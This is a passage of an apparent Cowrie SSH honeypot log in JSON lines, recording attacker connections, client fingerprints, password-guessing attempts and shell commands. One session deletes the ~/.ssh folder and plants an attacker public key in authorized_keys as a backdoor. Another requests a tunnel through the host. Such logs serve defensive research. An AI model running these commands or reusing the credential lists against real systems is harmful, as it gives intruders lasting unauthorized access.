ur128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-cbc","3des-cbc","arcfour"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 7216c7c473918b4f83d1139b3c70dbf9","sensor":"my-vps","timestamp":"2025-08-26T18:28:58.445913Z","src_ip":"212.227.125.160","session":"b883a1dea7af"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:29:02.292763Z","src_ip":"212.227.125.160","session":"b883a1dea7af"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59432,"dst_ip":"1.2.3.4","dst_port":22,"session":"113aa858b9fd","protocol":"ssh","message":"New connection: 212.227.125.160:59432 (1.2.3.4:22) [session: 113aa858b9fd]","sensor":"my-vps","timestamp":"2025-08-26T18:29:09.602789Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:29:09.604255Z","src_ip":"212.227.125.160","session":"113aa858b9fd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59724,"dst_ip":"1.2.3.4","dst_port":22,"session":"7c67fd235d1c","protocol":"ssh","message":"New connection: 212.227.125.160:59724 (1.2.3.4:22) [session: 7c67fd235d1c]","sensor":"my-vps","timestamp":"2025-08-26T18:29:09.713452Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T18:29:09.714177Z","src_ip":"212.227.125.160","session":"7c67fd235d1c"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T18:29:09.827446Z","src_ip":"212.227.125.160","session":"7c67fd235d1c"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T18:29:10.170211Z","src_ip":"212.227.125.160","session":"7c67fd235d1c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T18:29:10.283587Z","session":"7c67fd235d1c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34382,"dst_ip":"1.2.3.4","dst_port":22,"session":"d5fbdbaaa863","protocol":"ssh","message":"New connection: 212.227.235.229:34382 (1.2.3.4:22) [session: d5fbdbaaa863]","sensor":"my-vps","timestamp":"2025-08-26T18:29:21.922863Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:29:21.923930Z","src_ip":"212.227.235.229","session":"d5fbdbaaa863"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:29:22.159620Z","src_ip":"212.227.235.229","session":"d5fbdbaaa863"}
{"eventid":"cowrie.login.failed","username":"user22","password":"user22","message":"login attempt [user22/user22] failed","sensor":"my-vps","timestamp":"2025-08-26T18:29:23.146376Z","src_ip":"212.227.235.229","session":"d5fbdbaaa863"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:29:24.384893Z","src_ip":"212.227.235.229","session":"d5fbdbaaa863"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:30:19.714451Z","src_ip":"212.227.125.160","session":"7c67fd235d1c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38364,"dst_ip":"1.2.3.4","dst_port":22,"session":"b0e27dcdf6c7","protocol":"ssh","message":"New connection: 212.227.235.229:38364 (1.2.3.4:22) [session: b0e27dcdf6c7]","sensor":"my-vps","timestamp":"2025-08-26T18:31:22.869349Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:31:22.870746Z","src_ip":"212.227.235.229","session":"b0e27dcdf6c7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:31:23.103235Z","src_ip":"212.227.235.229","session":"b0e27dcdf6c7"}
{"eventid":"cowrie.login.success","username":"root","password":"admin_123!@#","message":"login attempt [root/admin_123!@#] succeeded","sensor":"my-vps","timestamp":"2025-08-26T18:31:24.038605Z","src_ip":"212.227.235.229","session":"b0e27dcdf6c7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:31:24.526763Z","src_ip":"212.227.235.229","session":"b0e27dcdf6c7"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T18:31:24.527498Z","src_ip":"212.227.235.229","session":"b0e27dcdf6c7"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T18:31:24.528753Z","src_ip":"212.227.235.229","session":"b0e27dcdf6c7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:31:24.764148Z","src_ip":"212.227.235.229","session":"b0e27dcdf6c7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":63625,"dst_ip":"1.2.3.4","dst_port":22,"session":"0867fc75e23d","protocol":"ssh","message":"New connection: 212.227.235.229:63625 (1.2.3.4:22) [session: 0867fc75e23d]","sensor":"my-vps","timestamp":"2025-08-26T18:31:25.271900Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T18:31:25.272910Z","src_ip":"212.227.235.229","session":"0867fc75e23d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:31:25.343624Z","src_ip":"212.227.235.229","session":"b0e27dcdf6c7"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T18:31:25.344314Z","src_ip":"212.227.235.229","session":"b0e27dcdf6c7"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T18:31:25.405079Z","src_ip":"212.227.235.229","session":"0867fc75e23d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T18:31:25.580752Z","src_ip":"212.227.235.229","session":"b0e27dcdf6c7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:31:25.581832Z","src_ip":"212.227.235.229","session":"b0e27dcdf6c7"}
{"eventid":"cowrie.login.failed","username":"justine","password":"justine","message":"login attempt [justine/justine] failed","sensor":"my-vps","timestamp":"2025-08-26T18:31:26.031163Z","src_ip":"212.227.235.229","session":"0867fc75e23d"}
{"eventid":"cowrie.login.failed","username":"justine","password":"justine1","message":"login attempt [justine/justine1] failed","sensor":"my-vps","timestamp":"2025-08-26T18:31:27.167769Z","src_ip":"212.227.235.229","session":"0867fc75e23d"}
{"eventid":"cowrie.login.failed","username":"justine","password":"justine123","message":"login attempt [justine/justine123] failed","sensor":"my-vps","timestamp":"2025-08-26T18:31:28.309116Z","src_ip":"212.227.235.229","session":"0867fc75e23d"}
{"eventid":"cowrie.login.failed","username":"justine","password":"justine1234","message":"login attempt [justine/justine1234] failed","sensor":"my-vps","timestamp":"2025-08-26T18:31:29.443653Z","src_ip":"212.227.235.229","session":"0867fc75e23d"}
{"eventid":"cowrie.login.failed","username":"justine","password":"justine12345","message":"login attempt [justine/justine12345] failed","sensor":"my-vps","timestamp":"2025-08-26T18:31:30.578430Z","src_ip":"212.227.235.229","session":"0867fc75e23d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38370,"dst_ip":"1.2.3.4","dst_port":22,"session":"9bde823fa475","protocol":"ssh","message":"New connection: 212.227.235.229:38370 (1.2.3.4:22) [session: 9bde823fa475]","sensor":"my-vps","timestamp":"2025-08-26T18:31:30.936382Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:31:30.937343Z","src_ip":"212.227.235.229","session":"9bde823fa475"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:31:31.170211Z","src_ip":"212.227.235.229","session":"9bde823fa475"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:31:31.580616Z","src_ip":"212.227.235.229","session":"9bde823fa475"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:31:31.712621Z","src_ip":"212.227.235.229","session":"0867fc75e23d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38384,"dst_ip":"1.2.3.4","dst_port":22,"session":"ee987bf309ad","protocol":"ssh","message":"New connection: 212.227.235.229:38384 (1.2.3.4:22) [session: ee987bf309ad]","sensor":"my-vps","timestamp":"2025-08-26T18:31:35.935103Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:31:35.936095Z","src_ip":"212.227.235.229","session":"ee987bf309ad"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:31:36.172216Z","src_ip":"212.227.235.229","session":"ee987bf309ad"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T18:31:37.120053Z","src_ip":"212.227.235.229","session":"ee987bf309ad"}
{"eventid":"cowrie.session.closed","duration":"14.5","message":"Connection lost after 14.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:31:37.355994Z","src_ip":"212.227.235.229","session":"b0e27dcdf6c7"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:31:37.358944Z","src_ip":"212.227.235.229","session":"ee987bf309ad"}
{"eventid":"cowrie.session.connect","src_ip":"43.134.41.225","src_port":34388,"dst_ip":"1.2.3.4","dst_port":22,"session":"86cdce6556a3","protocol":"ssh","message":"New connection: 43.134.41.225:34388 (1.2.3.4:22) [session: 86cdce6556a3]","sensor":"my-vps","timestamp":"2025-08-26T18:31:52.114083Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T18:31:52.115115Z","src_ip":"43.134.41.225","session":"86cdce6556a3"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-26T18:31:52.352655Z","src_ip":"43.134.41.225","session":"86cdce6556a3"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:32:00.114290Z","src_ip":"43.134.41.225","session":"86cdce6556a3"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":56090,"dst_ip":"1.2.3.4","dst_port":22,"session":"a8acba1b9d74","protocol":"ssh","message":"New connection: 217.72.205.35:56090 (1.2.3.4:22) [session: a8acba1b9d74]","sensor":"my-vps","timestamp":"2025-08-26T18:32:06.618499Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:32:06.620185Z","src_ip":"217.72.205.35","session":"a8acba1b9d74"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48120,"dst_ip":"1.2.3.4","dst_port":22,"session":"e2f622996eec","protocol":"ssh","message":"New connection: 212.227.235.229:48120 (1.2.3.4:22) [session: e2f622996eec]","sensor":"my-vps","timestamp":"2025-08-26T18:32:43.328335Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","message":"Remote SSH version: SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","sensor":"my-vps","timestamp":"2025-08-26T18:32:43.329320Z","src_ip":"212.227.235.229","session":"e2f622996eec"}
{"eventid":"cowrie.client.kex","hassh":"390ffe68a68c2a2891210413e80689fa","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com,zlib","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","sk-ecdsa-sha2-nistp256-c